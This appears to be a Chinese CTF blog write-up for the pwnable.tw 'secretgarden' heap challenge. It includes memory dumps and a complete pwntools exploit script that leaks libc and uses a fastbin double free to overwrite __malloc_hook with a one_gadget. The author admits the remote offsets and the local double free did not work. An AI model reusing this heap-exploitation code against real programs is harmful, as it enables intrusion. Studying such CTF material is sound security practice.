By

Contents
  1. 1. secretgarden
    1. 1.1. exp

secretgarden

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled
FORTIFY:  Enabled

(保护全开好可怕55

菜单

1
2
3
4
5
6
7
8
9
☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ 
☆          Secret Garden      			    ☆ 
☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ 

  1 . Raise a flower 
  2 . Visit the garden 
  3 . Remove a flower from the garden
  4 . Clean the garden
  5 . Leave the garden

remove没有置零,有double free漏洞

  1. 申请unsorted bin泄露libc
  2. double free修改fd到__malloc_hook等,改malloc为one_gadget,不过这里,one的条件都不符合,所以需要触发malloc_printerr
1
2
3
4
5
6
7
8
9
10
11
12
13
[+] malloc_addr = 0x7f4f71258c30
pwndbg> x/10gx 0x7f4f71258c00
0x7f4f71258c00 <_IO_wide_data_0+288>:	0x0000000000000000	0x0000000000000000
0x7f4f71258c10 <_IO_wide_data_0+304>:	0x00007f4f71254d60	0x0000000000000000
0x7f4f71258c20 <__memalign_hook>:	0x00007f4f70f04480	0x00007f4f70f05800
0x7f4f71258c30 <__malloc_hook>:	0x0000000000000000	0x0000000000000000
0x7f4f71258c40 <main_arena>:	0x0000000000000000	0x0000000000000000
pwndbg> x/10gx 0x7f4f71258c30-0x23
0x7f4f71258c0d <_IO_wide_data_0+301>:	0x4f71254d60000000	0x000000000000007f -------> fake chunk
0x7f4f71258c1d:	0x4f70f04480000000	0x4f70f0580000007f
0x7f4f71258c2d <__realloc_hook+5>:	0x000000000000007f	0x0000000000000000
0x7f4f71258c3d:	0x0000000000000000	0x0000000000000000
0x7f4f71258c4d <main_arena+13>:	0x0000000000000000	0x0000000000000000

exp

本地泄露是libc基址,但是远程,偏移就不对了,我也不知道怎么测555。而且本地double free并不能成功,但是感觉没毛病

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
#!usr/bin/python
from pwn import *
context.log_level = 'debug'

binary = "./secretgarden"
ip = "chall.pwnable.tw"
port = 10203
elf = ELF(binary)

def menu(choice):
	io.sendlineafter("choice : ", str(choice))

def sraise(length, name, color):
	menu(1)
	io.sendlineafter("name :", str(length))
	io.sendafter("name of flower :", name)
	io.sendlineafter("the flower :", color)

def svisit():
	menu(2)

def sremove(idx):
	menu(3)
	io.sendlineafter("garden:", str(idx))

def sclean():
	menu(4)


def pwn(ip, port, debug):
	global io
	if debug == 1:
		io = process(binary)
		libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")	
		one = [0x4f365, 0x4f3c2, 0x10a45c]
		main_arena_offset = 0x3ebc40
	else:
		io = remote(ip, port)
		libc = ELF("libc_64.so.6")
		one = [0x45216, 0x4526a, 0xef6c4, 0xf0567]
		main_arena_offset = 0x3c3b20
	
	success("main_arena_offset = "+hex(libc.sym['__malloc_hook']+0x10))
	sraise(0x30, "a"*8, "y")		# 0
	sraise(0x500, "a"*16, "y")		# 1
	sraise(0x30, "a"*8, "y")		# 2
	sremove(0)
	sremove(1)
	sraise(0x400, "b"*8, "y")		# 3
	# gdb.attach(io)
	svisit()
	io.recvuntil("b"*8)
	libc_base = u64(io.recv(6).ljust(8, '\x00')) - 0x480 - main_arena_offset		
	malloc_addr = libc_base + libc.sym['__malloc_hook']
	one = libc_base + one[2]
	success("libc_base = "+hex(libc_base))
	success("malloc_addr = "+hex(malloc_addr))
	success("one_addr = "+hex(one))
	
	sraise(0x68, "c"*8, "y")		# 4
	sraise(0x68, "c"*8, "y")		# 5
	sremove(4)
	sremove(5)
	sremove(4)
	sraise(0x68, p64(malloc_addr-0x23), "y")		# 6
	
	sraise(0x68, "d"*8, "y")		# 7
	sraise(0x68, "d"*8, "y")		# 8
	sraise(0x68, "e"*0x13+p64(one), "y")		# 9
	
	gdb.attach(io)
	
	# io.sendlineafter("choice : ", "1")
	
	sremove(8)
	sremove(8)
	
	io.interactive()

if __name__ == '__main__':
	pwn(ip, port, 1)

https://blog.ivan0.com/2018/11/18/pwnable-tw-secretgarden/

这个给了两种解法,挺好